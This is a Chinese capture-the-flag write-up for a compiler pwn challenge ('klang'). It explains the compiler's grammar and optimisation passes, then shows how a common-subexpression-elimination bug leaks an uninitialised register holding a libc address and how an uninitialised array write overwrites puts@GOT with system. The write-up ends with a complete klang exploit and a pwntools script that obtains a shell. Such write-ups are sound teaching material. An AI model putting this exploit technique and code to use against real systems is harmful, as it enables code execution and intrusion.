klang 1 2 3 4 5 6 klang: ELF 64 -bit LSB pie executable, x86-64 , version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64. so.2 , BuildID[sha1]=e64881fc54f3e0dfbb35631a6411af676c0f2d93, for GNU/Linux 3.2 .0 , with debug_info, not stripped Arch: amd64-64 -little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled
64位,dynamically,Partial RELRO,NX,PIE
题目的启动脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 def main (): if not check_token(): print ("Invalid token." ) return 1 signal.alarm(600 ) if not proof_of_work(): print ("Invalid proof of work." ) return 1 signal.alarm(0 ) writeline("Give me your code, ended by a line with 'END_OF_SNIPPET' (excluding quote)." ) code = [] while True : line = input () if line == 'END_OF_SNIPPET' : break code.append(line) code = '\n' .join(code) if len (code) > 1024 : print ("Code too long." ) return 1 exe_path = compile (code) if not exe_path: print ("Compilation failed." ) return 1 run_binary(exe_path) return 0
1 2 3 4 5 6 7 8 9 10 def run_binary (exe_path ): os.chdir(WORKDIR) os.chmod(exe_path, 0o755 ) os.setgroups([]) os.setgid(GID) os.setuid(UID) commands = ["prlimit" , "--as=67108864" , "--cpu=30" , "--nproc=5" , "--" , exe_path] os.execvp("prlimit" , commands)
漏洞分析
这是一个编译器,通过 klang/src/compiler/Semantic
和 klang/src/compiler/SemanticParser
可以分析出该编译器的语法规则
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ASTModule* ParseSource (const char * FileName) { std::ifstream Input (FileName, std::ifstream::in) ; if (!Input.is_open ()) { std::cerr << "Error: cannot open file " << FileName << std::endl; return nullptr ; } Scanner S (&Input) ; Parser P (S) ; if (P.parse () != 0 ) { std::cerr << "Error: parsing failed" << std::endl; return nullptr ; } return GetModule (); }
cpp 的 flex 和 bison 要高级一些,其中完成了大多数的工作:
1 2 3 4 "int" { return Parser::make_INT(location()); }"array" { return Parser::make_ARRAY(location()); }"string" { return Parser::make_STRINGK(location()); }"void" { return Parser::make_VOID(location()); }
Parser::xx
是由 bison 自动生成,token 流的结构信息也由 bison 生成并管理
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 single_statement : ID ASSIGN expression { $$ = new ASTStatementAssign(new ASTExpressionVariable($1 ), $3 , yylineno); } | ID LIDX expression RIDX ASSIGN expression { $$ = new ASTStatementAssign(new ASTExpressionArrayAccess($1 , $3 ), $6 , yylineno); } | ID LBRAC expression_list RBRAC { $$ = new ASTStatementFunctionCall(new ASTExpressionFunctionCall($1 , $3 ), yylineno); } | IF LBRAC expression RBRAC block ELSE block { $$ = new ASTStatementIfElse($3 , $5 , $7 , yylineno); } | IF LBRAC expression RBRAC block { $$ = new ASTStatementIf($3 , $5 , yylineno); } | DO block WHILE LBRAC expression RBRAC { $$ = new ASTStatementWhile($5 , $2 , yylineno); } | RETURN expression { $$ = new ASTStatementReturn($2 , yylineno); } | RETURN { $$ = new ASTStatementReturn(nullptr , yylineno); } ;
每个不同的 AST 节点其实对应了一个类(在 klang/src/compiler/Semantic/AST.h
中实现)
AST 的层次结构如下:
1 2 3 4 5 6 7 8 class ASTModule {public : ...... private : std::vector<ASTFunction*> Functions_; std::map<ASTName, ASTFuncPrototype> ExternalFunctions_; };
1 2 3 4 5 6 7 8 9 10 11 12 class ASTFunction {public : ...... private : ASTName Name_; ASTModule* Parent_; ASTType ReturnType_; std::vector<ASTParameter> Parameters_; std::vector<ASTVarDef> Variables_; std::vector<ASTStatement*> Statements_; };
ASTFunction:包含参数,局部变量和若干语句
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 class ASTStatement {public : enum ASTStatementType : int { ST_ASSIGN, ST_IF, ST_IFELSE, ST_WHILE, ST_RETURN, ST_CALL, }; ...... private : ASTFunction* Parent_; ASTStatementType Type_; int LineNo_; };
ASTStatement:不同的语句都会继承 ASTStatement
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 class ASTExpression {public : enum ASTExpressionType : int { EX_INTEGER, EX_STRING, EX_BINARY, EX_FUNCTION_CALL, EX_VARIABLE, EX_ARRAY_ACCESS, }; ...... private : ASTExpressionType Type_; ASTStatement* Parent_; };
ASTExpression:不同的语句都会继承 ASTExpression
语法分析最终会形成一个 AST,各个 AST 节点之间的层次关系支撑起了 AST 的结构,语义分析需要的数据信息也包含在各个 AST 节点中
该编译器提供了一些内置函数:
1 2 3 4 5 6 7 8 9 10 11 12 auto *Module = ParseSource (FileName);if (!Module) { return 1 ; } Module->AddExternalFunction ("printi" , std::make_pair (TY_VOID, std::vector<ASTType>{TY_INTEGER})); Module->AddExternalFunction ("prints" , std::make_pair (TY_VOID, std::vector<ASTType>{TY_STRING})); Module->AddExternalFunction ("inputi" , std::make_pair (TY_INTEGER, std::vector<ASTType>{})); Module->AddExternalFunction ("inputs" , std::make_pair (TY_STRING, std::vector<ASTType>{})); Module->AddExternalFunction ("random" , std::make_pair (TY_INTEGER, std::vector<ASTType>{})); Module->AddExternalFunction ("array_new" , std::make_pair (TY_ARRAY, std::vector<ASTType>{TY_INTEGER}));
1 2 3 using ASTType = int ;using ASTName = std::string;using ASTFuncPrototype = std::pair<ASTType, std::vector<ASTType>>;
1 2 std::vector<ASTFunction*> Functions_; std::map<ASTName, ASTFuncPrototype> ExternalFunctions_;
1 2 3 void AddExternalFunction (const char * Name, ASTFuncPrototype Prototype) { ExternalFunctions_[Name] = Prototype; }
AddExternalFunction 传入两个参数:“函数名” 和一个 pair 类型(用于记录函数返回值和传参)
在语义分析的过程中,会以 ASTFunction 为单位将 AST 节点转化为 IR 节点(在 klang/src/include/IR/IR.h
中实现):
1 2 3 4 5 6 7 8 9 std::pair<ModuleGenCtx, Module*> IRGen::Generate () { Module* TheModule = new Module ("<main>" ); ModuleGenCtx Ctx (Module_) ; for (auto *F : Module_->GetFunctions ()) { TheModule->AddFunction (GenerateFunction (Ctx, F)); } return std::make_pair (Ctx, TheModule); }
先初始化根 IR 节点 TheModule,然后调用 GenerateFunction 将 AST 节点转化为 IR 节点
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Function* IRGen::GenerateFunction (ModuleGenCtx& MCtx, ASTFunction* F) { FuncBuilder* B = new FuncBuilder (F->GetName (), F->GetParameters ().size ()); FuncGenCtx Ctx (F, B, &MCtx) ; Ctx.InitVariables (); GenerateBlock (Ctx, F->GetStatements ()); auto *Entry = B->GetFunction ()->Entry (); auto *Inst = Entry->Head (); for (auto &Var : F->GetVariables ()) { Entry->InsertBefore (new AssignInst (Ctx.GetVariable (Var.first), B->Imm (0 )), Inst); } return B->GetFunction (); }
接着编译器会进行一些优化操作:
1 2 3 4 5 6 7 8 9 10 11 12 void OptimizeIR (Function* F) { bool Changed; do { Changed = false ; Changed |= ConstantPropagate (F); Changed |= CopyPropagate (F); Changed |= LocalCSE (F); Changed |= GlobalCSE (F); Changed |= DeadCodeElimination (F); } while (Changed); return ; }
最后生成汇编代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 bool ModuleCodegen::Generate () { ModuleSS_ << ".intel_syntax noprefix\n" ; ModuleSS_ << ".text\n" ; for (auto *F : (*Module_)) { MachineFuncBuilder Builder (F) ; Builder.Generate (); Builder.GetFunction ()->Emit (ModuleSS_); ModuleSS_ << '\n' ; } ModuleSS_ << ".data\n" ; GenerateStringLiterals (); return true ; }
程序的漏洞点就发生在优化这一步
公共子表达式消除 CSE:如果一个表达式 e 已经计算过了,并且从先前的计算到现在 e 中所有变量的值都没有发生变化,那么 e 就成为公共子表达式:
1 2 3 4 5 6 7 8 9 10 11 function main () : -> int { printi(leak_libc(1 )); return 0 ; } function leak_libc (int a) : int b-> int { b := a + 1 ; do { }while ( a + 1 < 10 ); return b; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 .global K_leak_libc K_leak_libc: _leak_libc_bb1: push rbp mov rbp, rsp mov rcx, qword ptr [rbp + 16] add rcx, 0x1 mov r8, rcx jmp _leak_libc_bb3 _leak_libc_bb2: mov rax, r8 mov rsp, rbp pop rbp ret _leak_libc_bb3: xor r9, r9 cmp rcx, 0xa # 优化点 mov rax, 0x1 cmovl r9, rax test r9, r9 jne _leak_libc_bb3 jmp _leak_libc_bb2
这里的 a + 1
就是公共子表达式,已经被寄存器 RCX 代替
在正常情况下这种优化没有问题,但如果公共子表达式没有初始化,那么用于替代的寄存器就不会初始化:
1 2 3 4 5 6 7 8 9 10 11 function main () : -> int { printi(leak_libc()); return 0 ; } function leak_libc () : int a,int b-> int { b := a + 1 ; do { }while ( a + 1 < 10 ); return b; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 .global K_leak_libc K_leak_libc: _leak_libc_bb1: push rbp mov rbp, rsp jmp _leak_libc_bb3 _leak_libc_bb2: mov rax, 0x1 mov rsp, rbp pop rbp ret _leak_libc_bb3: test rcx, rcx # 优化点 jne _leak_libc_bb3 jmp _leak_libc_bb2
显然这里的 RCX 寄存器并没有初始化,并且 do-while 语句的部分代码也被优化掉了
入侵思路
利用 “公共子表达式消除” 的漏洞可以泄露未初始化的 RCX 寄存器(泄露 libc 地址):
1 2 3 4 5 6 7 8 9 10 11 function main () : -> int { printi(leak_libc()); return 0 ; } function leak_libc () : int a-> int { do { if (a==1 ){}; }while (0 ); return a==1 ; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 .global K_leak_libc K_leak_libc: _leak_libc_bb1: push rbp mov rbp, rsp jmp _leak_libc_bb3 _leak_libc_bb2: mov rax, r8 mov rsp, rbp pop rbp ret _leak_libc_bb3: test rcx, rcx mov r8, rcx jne _leak_libc_bb5 jmp _leak_libc_bb4 _leak_libc_bb4: jmp _leak_libc_bb2 _leak_libc_bb5: jmp _leak_libc_bb4
我们可以拷贝题目 docker 容器中,目录 /workdir
下的二进制文件,然后用 GDB 进行调试:
1 2 3 RAX 0x7ffff7e9bd9b (alarm+11 ) ◂— cmp rax, -0xfff RBX 0x4016b0 (__libc_csu_init) ◂— endbr64 RCX 0x7ffff7e9bd9b (alarm+11 ) ◂— cmp rax, -0xfff
1 2 3 4 0x40121e <_leak_libc_bb2> mov rax, r8 0x401221 <_leak_libc_bb2+3 > mov rsp, rbp 0x401224 <_leak_libc_bb2+6 > pop rbp ► 0x401225 <_leak_libc_bb2+7 > ret <0x4011ff ; K_main+9 >
程序还有另一处漏洞:
1 2 3 4 5 6 7 8 9 10 11 12 function wr64 () : int v,string s -> void { v := inputi(); s := inputs(); _wr64(s,v); return ; } function _wr64(string x,int b) : array t -> void { t[0 ] := b; t := array_new(1 ); return ; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 .global K__wr64 K__wr64: __wr64_bb1: push rbp mov rbp, rsp sub rsp, 0x8 push qword ptr [rbp + 24] # 第3个参数 push 0x0 # 第2个参数 push rcx # 第1个参数 mov qword ptr [rbp - 8], rcx call K_array_store mov rcx, qword ptr [rbp - 8] add rsp, 0x18 push 0x1 mov qword ptr [rbp - 8], rcx call K_array_new mov rcx, qword ptr [rbp - 8] mov r8, rax add rsp, 0x8 mov rcx, r8 mov rsp, rbp pop rbp ret
按照正常的语法,对于 array 应该先调用 array_new 开辟内存空间,然后才能调用 array_store 存储数据
但事实上 array_store 可以利用遗留在寄存器上的地址作为内存空间
其第一个参数 RCX 没有初始化,可以是上一个函数遗留的值
1 2 3 4 5 6 7 8 9 void do_array_store (struct array_t * arr, int64_t index, int64_t value) { if (!arr) { fatal ("Array is null" ); } if (index < 0 || index >= arr->size) { fatal ("Array index out of bounds" ); } arr->data[index] = value; }
接下来的入侵思路就比较清晰了:
先往 inputi
中写入 system_addr
再往 inputs
中写入 puts_got
然后寄存器 RCX 会由于没有初始化而存储有 puts_got
的地址
正常调用 do_array_store,就会往 puts_got
中写入 system_addr
1 2 p.sendline(str (system_addr)) p.sendline(p64(0x404018 ))
完整 exp 如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 function main () : -> int { printi(leak_libc()); wr64(); prints("cat /flag" ); return 0 ; } function leak_libc () : int a-> int { do { if (a==1 ){}; }while (0 ); return a==1 ; } function wr64 () : int v,string s -> void { v := inputi(); s := inputs(); _wr64(s,v); return ; } function _wr64(string x,int b) : array t -> void { t[0 ] := b; t := array_new(1 ); return ; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 from pwn import *context.log_level='DEBUG' libc = ELF("/lib/x86_64-linux-gnu/libc.so.6" ) local = 0 if local: p=process("./exp.exe" ) else : p=remote("127.0.0.1" ,9999 ) p.sendlineafter(b'END_OF_SNIPPET' ,open ("./exp.klang" ).read()) p.sendline("END_OF_SNIPPET" ) p.recvuntil("(excluding quote).\n" ) def debug (): gdb.attach(p,"b* 0x40127b\n" ) pause() leak_addr = eval (p.recvuntil("\n" )) libc_base = leak_addr - 0xe2d9b success("leak_addr >> " +hex (leak_addr)) success("libc_base >> " +hex (libc_base)) system_addr = libc_base + libc.symbols['system' ] success("system_addr >> " +hex (system_addr)) p.sendline(str (system_addr)) p.sendline(p64(0x404018 )) p.interactive()